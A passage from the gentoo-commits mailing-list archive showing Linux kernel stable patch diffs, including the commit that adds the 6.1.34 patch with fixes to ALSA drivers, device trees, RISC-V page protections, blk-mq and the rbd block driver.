+diff --git a/sound/soc/intel/avs/pcm.c b/sound/soc/intel/avs/pcm.c
+index 8fe5917b1e263..22f21f3f612d1 100644
+--- a/sound/soc/intel/avs/pcm.c
++++ b/sound/soc/intel/avs/pcm.c
+@@ -424,21 +424,34 @@ static int avs_dai_fe_startup(struct snd_pcm_substream *substream, struct snd_so
+ 
+ 	host_stream = snd_hdac_ext_stream_assign(bus, substream, HDAC_EXT_STREAM_TYPE_HOST);
+ 	if (!host_stream) {
+-		kfree(data);
+-		return -EBUSY;
++		ret = -EBUSY;
++		goto err;
+ 	}
+ 
+ 	data->host_stream = host_stream;
+-	snd_pcm_hw_constraint_integer(runtime, SNDRV_PCM_HW_PARAM_PERIODS);
++	ret = snd_pcm_hw_constraint_integer(runtime, SNDRV_PCM_HW_PARAM_PERIODS);
++	if (ret < 0)
++		goto err;
++
+ 	/* avoid wrap-around with wall-clock */
+-	snd_pcm_hw_constraint_minmax(runtime, SNDRV_PCM_HW_PARAM_BUFFER_TIME, 20, 178000000);
+-	snd_pcm_hw_constraint_list(runtime, 0, SNDRV_PCM_HW_PARAM_RATE, &hw_rates);
++	ret = snd_pcm_hw_constraint_minmax(runtime, SNDRV_PCM_HW_PARAM_BUFFER_TIME, 20, 178000000);
++	if (ret < 0)
++		goto err;
++
++	ret = snd_pcm_hw_constraint_list(runtime, 0, SNDRV_PCM_HW_PARAM_RATE, &hw_rates);
++	if (ret < 0)
++		goto err;
++
+ 	snd_pcm_set_sync(substream);
+ 
+ 	dev_dbg(dai->dev, "%s fe STARTUP tag %d str %p",
+ 		__func__, hdac_stream(host_stream)->stream_tag, substream);
+ 
+ 	return 0;
++
++err:
++	kfree(data);
++	return ret;
+ }
+ 
+ static void avs_dai_fe_shutdown(struct snd_pcm_substream *substream, struct snd_soc_dai *dai)
+diff --git a/sound/soc/soc-pcm.c b/sound/soc/soc-pcm.c
+index 7a486ca9633c1..f3964060a0447 100644
+--- a/sound/soc/soc-pcm.c
++++ b/sound/soc/soc-pcm.c
+@@ -2403,6 +2403,9 @@ int dpcm_be_dai_prepare(struct snd_soc_pcm_runtime *fe, int stream)
+ 		if (!snd_soc_dpcm_be_can_update(fe, be, stream))
+ 			continue;
+ 
++		if (!snd_soc_dpcm_can_be_prepared(fe, be, stream))
++			continue;
++
+ 		if ((be->dpcm[stream].state != SND_SOC_DPCM_STATE_HW_PARAMS) &&
+ 		    (be->dpcm[stream].state != SND_SOC_DPCM_STATE_STOP) &&
+ 		    (be->dpcm[stream].state != SND_SOC_DPCM_STATE_SUSPEND) &&
+@@ -3043,3 +3046,20 @@ int snd_soc_dpcm_can_be_params(struct snd_soc_pcm_runtime *fe,
+ 	return snd_soc_dpcm_check_state(fe, be, stream, state, ARRAY_SIZE(state));
+ }
+ EXPORT_SYMBOL_GPL(snd_soc_dpcm_can_be_params);
++
++/*
++ * We can only prepare a BE DAI if any of it's FE are not prepared,
++ * running or paused for the specified stream direction.
++ */
++int snd_soc_dpcm_can_be_prepared(struct snd_soc_pcm_runtime *fe,
++				 struct snd_soc_pcm_runtime *be, int stream)
++{
++	const enum snd_soc_dpcm_state state[] = {
++		SND_SOC_DPCM_STATE_START,
++		SND_SOC_DPCM_STATE_PAUSED,
++		SND_SOC_DPCM_STATE_PREPARE,
++	};
++
++	return snd_soc_dpcm_check_state(fe, be, stream, state, ARRAY_SIZE(state));
++}
++EXPORT_SYMBOL_GPL(snd_soc_dpcm_can_be_prepared);
+diff --git a/sound/usb/pcm.c b/sound/usb/pcm.c
+index 1e1d7458bce10..f2c798c4506b0 100644
+--- a/sound/usb/pcm.c
++++ b/sound/usb/pcm.c
+@@ -650,6 +650,10 @@ static int snd_usb_pcm_prepare(struct snd_pcm_substream *substream)
+ 		goto unlock;
+ 	}
+ 
++	ret = snd_usb_pcm_change_state(subs, UAC3_PD_STATE_D0);
++	if (ret < 0)
++		goto unlock;
++
+  again:
+ 	if (subs->sync_endpoint) {
+ 		ret = snd_usb_endpoint_prepare(chip, subs->sync_endpoint);
+diff --git a/sound/usb/quirks.c b/sound/usb/quirks.c
+index 3ecd1ba7fd4b1..6cf55b7f7a041 100644
+--- a/sound/usb/quirks.c
++++ b/sound/usb/quirks.c
+@@ -2191,6 +2191,8 @@ static const struct usb_audio_quirk_flags_table quirk_flags_table[] = {
+ 		   QUIRK_FLAG_DSD_RAW),
+ 	VENDOR_FLG(0x2ab6, /* T+A devices */
+ 		   QUIRK_FLAG_DSD_RAW),
++	VENDOR_FLG(0x3336, /* HEM devices */
++		   QUIRK_FLAG_DSD_RAW),
+ 	VENDOR_FLG(0x3353, /* Khadas devices */
+ 		   QUIRK_FLAG_DSD_RAW),
+ 	VENDOR_FLG(0x3842, /* EVGA */
+diff --git a/tools/gpio/lsgpio.c b/tools/gpio/lsgpio.c
+index c61d061247e17..52a0be45410c9 100644
+--- a/tools/gpio/lsgpio.c
++++ b/tools/gpio/lsgpio.c
+@@ -94,7 +94,7 @@ static void print_attributes(struct gpio_v2_line_info *info)
+ 	for (i = 0; i < info->num_attrs; i++) {
+ 		if (info->attrs[i].id == GPIO_V2_LINE_ATTR_ID_DEBOUNCE)
+ 			fprintf(stdout, ", debounce_period=%dusec",
+-				info->attrs[0].debounce_period_us);
++				info->attrs[i].debounce_period_us);
+ 	}
+ }
+ 
+diff --git a/tools/testing/selftests/gpio/gpio-sim.sh b/tools/testing/selftests/gpio/gpio-sim.sh
+index 341e3de008968..bf67b23ed29ac 100755
+--- a/tools/testing/selftests/gpio/gpio-sim.sh
++++ b/tools/testing/selftests/gpio/gpio-sim.sh
+@@ -389,6 +389,9 @@ create_chip chip
+ create_bank chip bank
+ set_num_lines chip bank 8
+ enable_chip chip
++DEVNAME=`configfs_dev_name chip`
++CHIPNAME=`configfs_chip_name chip bank`
++SYSFS_PATH="/sys/devices/platform/$DEVNAME/$CHIPNAME/sim_gpio0/value"
+ $BASE_DIR/gpio-mockup-cdev -b pull-up /dev/`configfs_chip_name chip bank` 0
+ test `cat $SYSFS_PATH` = "1" || fail "bias setting does not work"
+ remove_chip chip
+diff --git a/tools/testing/selftests/net/forwarding/hw_stats_l3.sh b/tools/testing/selftests/net/forwarding/hw_stats_l3.sh
+index 9c1f76e108af1..1a936ffbacee7 100755
+--- a/tools/testing/selftests/net/forwarding/hw_stats_l3.sh
++++ b/tools/testing/selftests/net/forwarding/hw_stats_l3.sh
+@@ -84,8 +84,9 @@ h2_destroy()
+ 
+ router_rp1_200_create()
+ {
+-	ip link add name $rp1.200 up \
+-		link $rp1 addrgenmode eui64 type vlan id 200
++	ip link add name $rp1.200 link $rp1 type vlan id 200
++	ip link set dev $rp1.200 addrgenmode eui64
++	ip link set dev $rp1.200 up
+ 	ip address add dev $rp1.200 192.0.2.2/28
+ 	ip address add dev $rp1.200 2001:db8:1::2/64
+ 	ip stats set dev $rp1.200 l3_stats on
+@@ -256,9 +257,11 @@ reapply_config()
+ 
+ 	router_rp1_200_destroy
+ 
+-	ip link add name $rp1.200 link $rp1 addrgenmode none type vlan id 200
++	ip link add name $rp1.200 link $rp1 type vlan id 200
++	ip link set dev $rp1.200 addrgenmode none
+ 	ip stats set dev $rp1.200 l3_stats on
+-	ip link set dev $rp1.200 up addrgenmode eui64
++	ip link set dev $rp1.200 addrgenmode eui64
++	ip link set dev $rp1.200 up
+ 	ip address add dev $rp1.200 192.0.2.2/28
+ 	ip address add dev $rp1.200 2001:db8:1::2/64
+ }
+diff --git a/tools/testing/selftests/ptp/testptp.c b/tools/testing/selftests/ptp/testptp.c
+index 198ad5f321878..cfa9562f3cd83 100644
+--- a/tools/testing/selftests/ptp/testptp.c
++++ b/tools/testing/selftests/ptp/testptp.c
+@@ -502,11 +502,11 @@ int main(int argc, char *argv[])
+ 			interval = t2 - t1;
+ 			offset = (t2 + t1) / 2 - tp;
+ 
+-			printf("system time: %lld.%u\n",
++			printf("system time: %lld.%09u\n",
+ 				(pct+2*i)->sec, (pct+2*i)->nsec);
+-			printf("phc    time: %lld.%u\n",
++			printf("phc    time: %lld.%09u\n",
+ 				(pct+2*i+1)->sec, (pct+2*i+1)->nsec);
+-			printf("system time: %lld.%u\n",
++			printf("system time: %lld.%09u\n",
+ 				(pct+2*i+2)->sec, (pct+2*i+2)->nsec);
+ 			printf("system/phc clock time offset is %" PRId64 " ns\n"
+ 			       "system     clock time delay  is %" PRId64 " ns\n",
+diff --git a/tools/testing/selftests/tc-testing/config b/tools/testing/selftests/tc-testing/config
+index 4638c63a339ff..aec4de8bea78b 100644
+--- a/tools/testing/selftests/tc-testing/config
++++ b/tools/testing/selftests/tc-testing/config
+@@ -6,6 +6,7 @@ CONFIG_NF_CONNTRACK_MARK=y
+ CONFIG_NF_CONNTRACK_ZONES=y
+ CONFIG_NF_CONNTRACK_LABELS=y
+ CONFIG_NF_NAT=m
++CONFIG_NETFILTER_XT_TARGET_LOG=m
+ 
+ CONFIG_NET_SCHED=y
+ 
+diff --git a/tools/testing/selftests/tc-testing/tc-tests/qdiscs/sfb.json b/tools/testing/selftests/tc-testing/tc-tests/qdiscs/sfb.json
+index ba2f5e79cdbfe..e21c7f22c6d4c 100644
+--- a/tools/testing/selftests/tc-testing/tc-tests/qdiscs/sfb.json
++++ b/tools/testing/selftests/tc-testing/tc-tests/qdiscs/sfb.json
+@@ -58,10 +58,10 @@
+         "setup": [
+             "$IP link add dev $DUMMY type dummy || /bin/true"
+         ],
+-        "cmdUnderTest": "$TC qdisc add dev $DUMMY handle 1: root sfb db 10",
++        "cmdUnderTest": "$TC qdisc add dev $DUMMY handle 1: root sfb db 100",
+         "expExitCode": "0",
+         "verifyCmd": "$TC qdisc show dev $DUMMY",
+-        "matchPattern": "qdisc sfb 1: root refcnt [0-9]+ rehash 600s db 10ms",
++        "matchPattern": "qdisc sfb 1: root refcnt [0-9]+ rehash 600s db 100ms",
+         "matchCount": "1",
+         "teardown": [
+             "$TC qdisc del dev $DUMMY handle 1: root",
+diff --git a/tools/testing/selftests/tc-testing/tdc.sh b/tools/testing/selftests/tc-testing/tdc.sh
+index afb0cd86fa3df..eb357bd7923c0 100755
+--- a/tools/testing/selftests/tc-testing/tdc.sh
++++ b/tools/testing/selftests/tc-testing/tdc.sh
+@@ -2,5 +2,6 @@
+ # SPDX-License-Identifier: GPL-2.0
+ 
+ modprobe netdevsim
++modprobe sch_teql
+ ./tdc.py -c actions --nobuildebpf
+ ./tdc.py -c qdisc


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-06-14 10:17 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-06-14 10:17 UTC (permalink / raw
  To: gentoo-commits

commit:     0ad3ffd8bf544ac7186139ee99cda33f2f516805
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed Jun 14 10:17:43 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed Jun 14 10:17:43 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=0ad3ffd8

Linux patch 6.1.34

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1033_linux-6.1.34.patch | 5866 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 5870 insertions(+)

diff --git a/0000_README b/0000_README
index 5b332006..7c3280f5 100644
--- a/0000_README
+++ b/0000_README
@@ -171,6 +171,10 @@ Patch:  1032_linux-6.1.33.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.33
 
+Patch:  1033_linux-6.1.34.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.34
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1033_linux-6.1.34.patch b/1033_linux-6.1.34.patch
new file mode 100644
index 00000000..32aace74
--- /dev/null
+++ b/1033_linux-6.1.34.patch
@@ -0,0 +1,5866 @@
+diff --git a/Documentation/mm/page_table_check.rst b/Documentation/mm/page_table_check.rst
+index 1a09472f10a3c..d19ca356b7bf0 100644
+--- a/Documentation/mm/page_table_check.rst
++++ b/Documentation/mm/page_table_check.rst
+@@ -54,3 +54,22 @@ Build kernel with:
+ 
+ Optionally, build kernel with PAGE_TABLE_CHECK_ENFORCED in order to have page
+ table support without extra kernel parameter.
++
++Implementation notes
++====================
++
++We specifically decided not to use VMA information in order to avoid relying on
++MM states (except for limited "struct page" info). The page table check is a
++separate from Linux-MM state machine that verifies that the user accessible
++pages are not falsely shared.
++
++PAGE_TABLE_CHECK depends on EXCLUSIVE_SYSTEM_RAM. The reason is that without
++EXCLUSIVE_SYSTEM_RAM, users are allowed to map arbitrary physical memory
++regions into the userspace via /dev/mem. At the same time, pages may change
++their properties (e.g., from anonymous pages to named pages) while they are
++still being mapped in the userspace, leading to "corruption" detected by the
++page table check.
++
++Even with EXCLUSIVE_SYSTEM_RAM, I/O pages may be still allowed to be mapped via
++/dev/mem. However, these pages are always considered as named pages, so they
++won't break the logic used in the page table check.
+diff --git a/Documentation/networking/ip-sysctl.rst b/Documentation/networking/ip-sysctl.rst
+index 4ecb549fd052e..3301288a7c692 100644
+--- a/Documentation/networking/ip-sysctl.rst
++++ b/Documentation/networking/ip-sysctl.rst
+@@ -1247,8 +1247,8 @@ ping_group_range - 2 INTEGERS
+ 	Restrict ICMP_PROTO datagram sockets to users in the group range.
+ 	The default is "1 0", meaning, that nobody (not even root) may
+ 	create ping sockets.  Setting it to "100 100" would grant permissions
+-	to the single group. "0 4294967295" would enable it for the world, "100
+-	4294967295" would enable it for the users, but not daemons.
++	to the single group. "0 4294967294" would enable it for the world, "100
++	4294967294" would enable it for the users, but not daemons.
+ 
+ tcp_early_demux - BOOLEAN
+ 	Enable early demux for established TCP sockets.
+diff --git a/Makefile b/Makefile
+index 6be79c5c934f5..bc7cc17b0e759 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 33
++SUBLEVEL = 34
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm/boot/dts/at91-sama7g5ek.dts b/arch/arm/boot/dts/at91-sama7g5ek.dts
+index 3b25c67795ddb..4af8a1c96ed63 100644
+--- a/arch/arm/boot/dts/at91-sama7g5ek.dts
++++ b/arch/arm/boot/dts/at91-sama7g5ek.dts
+@@ -789,7 +789,7 @@
+ };
+ 
+ &shdwc {
+-	atmel,shdwc-debouncer = <976>;
++	debounce-delay-us = <976>;
+ 	status = "okay";
+ 
+ 	input@0 {
+diff --git a/arch/arm/mach-at91/pm.c b/arch/arm/mach-at91/pm.c
+index 60dc56d8acfb9..437dd0352fd44 100644
+--- a/arch/arm/mach-at91/pm.c
++++ b/arch/arm/mach-at91/pm.c
+@@ -334,16 +334,14 @@ static bool at91_pm_eth_quirk_is_valid(struct at91_pm_quirk_eth *eth)
+ 		pdev = of_find_device_by_node(eth->np);
+ 		if (!pdev)
+ 			return false;
++		/* put_device(eth->dev) is called at the end of suspend. */
+ 		eth->dev = &pdev->dev;
+ 	}
+ 
+ 	/* No quirks if device isn't a wakeup source. */
+-	if (!device_may_wakeup(eth->dev)) {
+-		put_device(eth->dev);
++	if (!device_may_wakeup(eth->dev))
+ 		return false;
+-	}
+ 
+-	/* put_device(eth->dev) is called at the end of suspend. */
+ 	return true;
+ }
+ 
+@@ -439,14 +437,14 @@ clk_unconfigure:
+ 				pr_err("AT91: PM: failed to enable %s clocks\n",
+ 				       j == AT91_PM_G_ETH ? "geth" : "eth");
+ 			}
+-		} else {
+-			/*
+-			 * Release the reference to eth->dev taken in
+-			 * at91_pm_eth_quirk_is_valid().
+-			 */
+-			put_device(eth->dev);
+-			eth->dev = NULL;
+ 		}
++
++		/*
++		 * Release the reference to eth->dev taken in
++		 * at91_pm_eth_quirk_is_valid().
++		 */
++		put_device(eth->dev);
++		eth->dev = NULL;
+ 	}
+ 
+ 	return ret;
+diff --git a/arch/arm64/boot/dts/freescale/imx8-ss-dma.dtsi b/arch/arm64/boot/dts/freescale/imx8-ss-dma.dtsi
+index d7b4229bb4a23..9ad56aaf19b42 100644
+--- a/arch/arm64/boot/dts/freescale/imx8-ss-dma.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8-ss-dma.dtsi
+@@ -26,6 +26,8 @@ dma_subsys: bus@5a000000 {
+ 		clocks = <&uart0_lpcg IMX_LPCG_CLK_4>,
+ 			 <&uart0_lpcg IMX_LPCG_CLK_0>;
+ 		clock-names = "ipg", "baud";
++		assigned-clocks = <&clk IMX_SC_R_UART_0 IMX_SC_PM_CLK_PER>;
++		assigned-clock-rates = <80000000>;
+ 		power-domains = <&pd IMX_SC_R_UART_0>;
+ 		status = "disabled";
+ 	};
+@@ -36,6 +38,8 @@ dma_subsys: bus@5a000000 {
+ 		clocks = <&uart1_lpcg IMX_LPCG_CLK_4>,
+ 			 <&uart1_lpcg IMX_LPCG_CLK_0>;
+ 		clock-names = "ipg", "baud";
++		assigned-clocks = <&clk IMX_SC_R_UART_1 IMX_SC_PM_CLK_PER>;
++		assigned-clock-rates = <80000000>;
+ 		power-domains = <&pd IMX_SC_R_UART_1>;
+ 		status = "disabled";
+ 	};
+@@ -46,6 +50,8 @@ dma_subsys: bus@5a000000 {
+ 		clocks = <&uart2_lpcg IMX_LPCG_CLK_4>,
+ 			 <&uart2_lpcg IMX_LPCG_CLK_0>;
+ 		clock-names = "ipg", "baud";
++		assigned-clocks = <&clk IMX_SC_R_UART_2 IMX_SC_PM_CLK_PER>;
++		assigned-clock-rates = <80000000>;
+ 		power-domains = <&pd IMX_SC_R_UART_2>;
+ 		status = "disabled";
+ 	};
+@@ -56,6 +62,8 @@ dma_subsys: bus@5a000000 {
+ 		clocks = <&uart3_lpcg IMX_LPCG_CLK_4>,
+ 			 <&uart3_lpcg IMX_LPCG_CLK_0>;
+ 		clock-names = "ipg", "baud";
++		assigned-clocks = <&clk IMX_SC_R_UART_3 IMX_SC_PM_CLK_PER>;
++		assigned-clock-rates = <80000000>;
+ 		power-domains = <&pd IMX_SC_R_UART_3>;
+ 		status = "disabled";
+ 	};
+diff --git a/arch/arm64/boot/dts/freescale/imx8mn-beacon-baseboard.dtsi b/arch/arm64/boot/dts/freescale/imx8mn-beacon-baseboard.dtsi
+index 9e82069c941fa..5a1f7c30afe57 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mn-beacon-baseboard.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mn-beacon-baseboard.dtsi
+@@ -81,7 +81,7 @@
+ &ecspi2 {
+ 	pinctrl-names = "default";
+ 	pinctrl-0 = <&pinctrl_espi2>;
+-	cs-gpios = <&gpio5 9 GPIO_ACTIVE_LOW>;
++	cs-gpios = <&gpio5 13 GPIO_ACTIVE_LOW>;
+ 	status = "okay";
+ 
+ 	eeprom@0 {
+@@ -202,7 +202,7 @@
+ 			MX8MN_IOMUXC_ECSPI2_SCLK_ECSPI2_SCLK		0x82
+ 			MX8MN_IOMUXC_ECSPI2_MOSI_ECSPI2_MOSI		0x82
+ 			MX8MN_IOMUXC_ECSPI2_MISO_ECSPI2_MISO		0x82
+-			MX8MN_IOMUXC_ECSPI1_SS0_GPIO5_IO9		0x41
++			MX8MN_IOMUXC_ECSPI2_SS0_GPIO5_IO13		0x41
+ 		>;
+ 	};
+ 
+diff --git a/arch/arm64/boot/dts/freescale/imx8qm-mek.dts b/arch/arm64/boot/dts/freescale/imx8qm-mek.dts
+index ce9d3f0b98fc0..607cd6b4e9721 100644
+--- a/arch/arm64/boot/dts/freescale/imx8qm-mek.dts
++++ b/arch/arm64/boot/dts/freescale/imx8qm-mek.dts
+@@ -82,8 +82,8 @@
+ 	pinctrl-0 = <&pinctrl_usdhc2>;
+ 	bus-width = <4>;
+ 	vmmc-supply = <&reg_usdhc2_vmmc>;
+-	cd-gpios = <&lsio_gpio4 22 GPIO_ACTIVE_LOW>;
+-	wp-gpios = <&lsio_gpio4 21 GPIO_ACTIVE_HIGH>;
++	cd-gpios = <&lsio_gpio5 22 GPIO_ACTIVE_LOW>;
++	wp-gpios = <&lsio_gpio5 21 GPIO_ACTIVE_HIGH>;
+ 	status = "okay";
+ };
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sc7180-lite.dtsi b/arch/arm64/boot/dts/qcom/sc7180-lite.dtsi
+index d8ed1d7b4ec76..4b306a59d9bec 100644
+--- a/arch/arm64/boot/dts/qcom/sc7180-lite.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc7180-lite.dtsi
+@@ -16,3 +16,11 @@
+ &cpu6_opp12 {
+ 	opp-peak-kBps = <8532000 23347200>;
+ };
++
++&cpu6_opp13 {
++	opp-peak-kBps = <8532000 23347200>;
++};
++
++&cpu6_opp14 {
++	opp-peak-kBps = <8532000 23347200>;
++};
+diff --git a/arch/arm64/boot/dts/qcom/sc8280xp.dtsi b/arch/arm64/boot/dts/qcom/sc8280xp.dtsi
+index ba684d980cf26..1afc960bab5c9 100644
+--- a/arch/arm64/boot/dts/qcom/sc8280xp.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc8280xp.dtsi
+@@ -1727,6 +1727,7 @@
+ 			qcom,tcs-config = <ACTIVE_TCS  2>, <SLEEP_TCS   3>,
+ 					  <WAKE_TCS    3>, <CONTROL_TCS 1>;
+ 			label = "apps_rsc";
++			power-domains = <&CLUSTER_PD>;
+ 
+ 			apps_bcm_voter: bcm-voter {
+ 				compatible = "qcom,bcm-voter";
+diff --git a/arch/riscv/Kconfig b/arch/riscv/Kconfig
+index 06b9b2f60b9fb..a85bbe28dcf46 100644
+--- a/arch/riscv/Kconfig
++++ b/arch/riscv/Kconfig
+@@ -25,6 +25,7 @@ config RISCV
+ 	select ARCH_HAS_GIGANTIC_PAGE
+ 	select ARCH_HAS_KCOV
+ 	select ARCH_HAS_MMIOWB
++	select ARCH_HAS_NON_OVERLAPPING_ADDRESS_SPACE
+ 	select ARCH_HAS_PTE_SPECIAL
+ 	select ARCH_HAS_SET_DIRECT_MAP if MMU
+ 	select ARCH_HAS_SET_MEMORY if MMU
+diff --git a/arch/riscv/include/asm/pgtable.h b/arch/riscv/include/asm/pgtable.h
+index 2aeaf8e3a4ab0..59bb53da473dd 100644
+--- a/arch/riscv/include/asm/pgtable.h
++++ b/arch/riscv/include/asm/pgtable.h
+@@ -165,8 +165,7 @@ extern struct pt_alloc_ops pt_ops __initdata;
+ 					 _PAGE_EXEC | _PAGE_WRITE)
+ 
+ #define PAGE_COPY		PAGE_READ
+-#define PAGE_COPY_EXEC		PAGE_EXEC
+-#define PAGE_COPY_READ_EXEC	PAGE_READ_EXEC
++#define PAGE_COPY_EXEC		PAGE_READ_EXEC
+ #define PAGE_SHARED		PAGE_WRITE
+ #define PAGE_SHARED_EXEC	PAGE_WRITE_EXEC
+ 
+diff --git a/arch/riscv/mm/init.c b/arch/riscv/mm/init.c
+index 2b9906ed2d1d1..d8d97df801909 100644
+--- a/arch/riscv/mm/init.c
++++ b/arch/riscv/mm/init.c
+@@ -286,7 +286,7 @@ static const pgprot_t protection_map[16] = {
+ 	[VM_EXEC]					= PAGE_EXEC,
+ 	[VM_EXEC | VM_READ]				= PAGE_READ_EXEC,
+ 	[VM_EXEC | VM_WRITE]				= PAGE_COPY_EXEC,
+-	[VM_EXEC | VM_WRITE | VM_READ]			= PAGE_COPY_READ_EXEC,
++	[VM_EXEC | VM_WRITE | VM_READ]			= PAGE_COPY_EXEC,
+ 	[VM_SHARED]					= PAGE_NONE,
+ 	[VM_SHARED | VM_READ]				= PAGE_READ,
+ 	[VM_SHARED | VM_WRITE]				= PAGE_SHARED,
+diff --git a/block/blk-mq.c b/block/blk-mq.c
+index 1ab41fbca0946..add013d5bbdab 100644
+--- a/block/blk-mq.c
++++ b/block/blk-mq.c
+@@ -685,6 +685,10 @@ static void __blk_mq_free_request(struct request *rq)
+ 	blk_crypto_free_request(rq);
+ 	blk_pm_mark_last_busy(rq);
+ 	rq->mq_hctx = NULL;
++
++	if (rq->rq_flags & RQF_MQ_INFLIGHT)
++		__blk_mq_dec_active_requests(hctx);
++
+ 	if (rq->tag != BLK_MQ_NO_TAG)
+ 		blk_mq_put_tag(hctx->tags, ctx, rq->tag);
+ 	if (sched_tag != BLK_MQ_NO_TAG)
+@@ -696,15 +700,11 @@ static void __blk_mq_free_request(struct request *rq)
+ void blk_mq_free_request(struct request *rq)
+ {
+ 	struct request_queue *q = rq->q;
+-	struct blk_mq_hw_ctx *hctx = rq->mq_hctx;
+ 
+ 	if ((rq->rq_flags & RQF_ELVPRIV) &&
+ 	    q->elevator->type->ops.finish_request)
+ 		q->elevator->type->ops.finish_request(rq);
+ 
+-	if (rq->rq_flags & RQF_MQ_INFLIGHT)
+-		__blk_mq_dec_active_requests(hctx);
+-
+ 	if (unlikely(laptop_mode && !blk_rq_is_passthrough(rq)))
+ 		laptop_io_completion(q->disk->bdi);
+ 
+diff --git a/drivers/block/rbd.c b/drivers/block/rbd.c
+index 60aed196a2e54..e009f480675d2 100644
+--- a/drivers/block/rbd.c
++++ b/drivers/block/rbd.c
+@@ -1334,14 +1334,30 @@ static bool rbd_obj_is_tail(struct rbd_obj_request *obj_req)
+ /*
+  * Must be called after rbd_obj_calc_img_extents().
+  */
+-static bool rbd_obj_copyup_enabled(struct rbd_obj_request *obj_req)
++static void rbd_obj_set_copyup_enabled(struct rbd_obj_request *obj_req)
+ {
+-	if (!obj_req->num_img_extents ||
+-	    (rbd_obj_is_entire(obj_req) &&
+-	     !obj_req->img_request->snapc->num_snaps))
+-		return false;
++	rbd_assert(obj_req->img_request->snapc);
+ 
+-	return true;
++	if (obj_req->img_request->op_type == OBJ_OP_DISCARD) {
++		dout("%s %p objno %llu discard\n", __func__, obj_req,
++		     obj_req->ex.oe_objno);
++		return;
++	}
++
++	if (!obj_req->num_img_extents) {
++		dout("%s %p objno %llu not overlapping\n", __func__, obj_req,
++		     obj_req->ex.oe_objno);
++		return;
++	}
++
++	if (rbd_obj_is_entire(obj_req) &&
++	    !obj_req->img_request->snapc->num_snaps) {
++		dout("%s %p objno %llu entire\n", __func__, obj_req,
++		     obj_req->ex.oe_objno);
++		return;
++	}
++
++	obj_req->flags |= RBD_OBJ_FLAG_COPYUP_ENABLED;
+ }
+ 
+ static u64 rbd_obj_img_extents_bytes(struct rbd_obj_request *obj_req)
+@@ -1442,6 +1458,7 @@ __rbd_obj_add_osd_request(struct rbd_obj_request *obj_req,
+ static struct ceph_osd_request *
+ rbd_obj_add_osd_request(struct rbd_obj_request *obj_req, int num_ops)
+ {
++	rbd_assert(obj_req->img_request->snapc);
+ 	return __rbd_obj_add_osd_request(obj_req, obj_req->img_request->snapc,
+ 					 num_ops);
+ }
+@@ -1578,15 +1595,18 @@ static void rbd_img_request_init(struct rbd_img_request *img_request,
+ 	mutex_init(&img_request->state_mutex);
+ }
+ 
++/*
++ * Only snap_id is captured here, for reads.  For writes, snapshot
++ * context is captured in rbd_img_object_requests() after exclusive
++ * lock is ensured to be held.
++ */
+ static void rbd_img_capture_header(struct rbd_img_request *img_req)
+ {
+ 	struct rbd_device *rbd_dev = img_req->rbd_dev;
+ 
+ 	lockdep_assert_held(&rbd_dev->header_rwsem);
+ 
+-	if (rbd_img_is_write(img_req))
+-		img_req->snapc = ceph_get_snap_context(rbd_dev->header.snapc);
+-	else
++	if (!rbd_img_is_write(img_req))
+ 		img_req->snap_id = rbd_dev->spec->snap_id;
+ 
+ 	if (rbd_dev_parent_get(rbd_dev))
+@@ -2233,9 +2253,6 @@ static int rbd_obj_init_write(struct rbd_obj_request *obj_req)
+ 	if (ret)
+ 		return ret;
+ 
+-	if (rbd_obj_copyup_enabled(obj_req))
+-		obj_req->flags |= RBD_OBJ_FLAG_COPYUP_ENABLED;
+-
+ 	obj_req->write_state = RBD_OBJ_WRITE_START;
+ 	return 0;
+ }
+@@ -2341,8 +2358,6 @@ static int rbd_obj_init_zeroout(struct rbd_obj_request *obj_req)
+ 	if (ret)
+ 		return ret;
+ 
+-	if (rbd_obj_copyup_enabled(obj_req))
+-		obj_req->flags |= RBD_OBJ_FLAG_COPYUP_ENABLED;
+ 	if (!obj_req->num_img_extents) {
+ 		obj_req->flags |= RBD_OBJ_FLAG_NOOP_FOR_NONEXISTENT;
+ 		if (rbd_obj_is_entire(obj_req))
+@@ -3287,6 +3302,7 @@ again:
+ 	case RBD_OBJ_WRITE_START:
+ 		rbd_assert(!*result);
+ 
++		rbd_obj_set_copyup_enabled(obj_req);
+ 		if (rbd_obj_write_is_noop(obj_req))
+ 			return true;
+ 
+@@ -3473,9 +3489,19 @@ static int rbd_img_exclusive_lock(struct rbd_img_request *img_req)
+ 
+ static void rbd_img_object_requests(struct rbd_img_request *img_req)
+ {
++	struct rbd_device *rbd_dev = img_req->rbd_dev;
+ 	struct rbd_obj_request *obj_req;
+ 
+ 	rbd_assert(!img_req->pending.result && !img_req->pending.num_pending);
++	rbd_assert(!need_exclusive_lock(img_req) ||
++		   __rbd_is_lock_owner(rbd_dev));
++
++	if (rbd_img_is_write(img_req)) {
++		rbd_assert(!img_req->snapc);
++		down_read(&rbd_dev->header_rwsem);
++		img_req->snapc = ceph_get_snap_context(rbd_dev->header.snapc);
++		up_read(&rbd_dev->header_rwsem);
++	}
+ 
+ 	for_each_obj_request(img_req, obj_req) {
+ 		int result = 0;
+@@ -3493,7 +3519,6 @@ static void rbd_img_object_requests(struct rbd_img_request *img_req)
+ 
+ static bool rbd_img_advance(struct rbd_img_request *img_req, int *result)
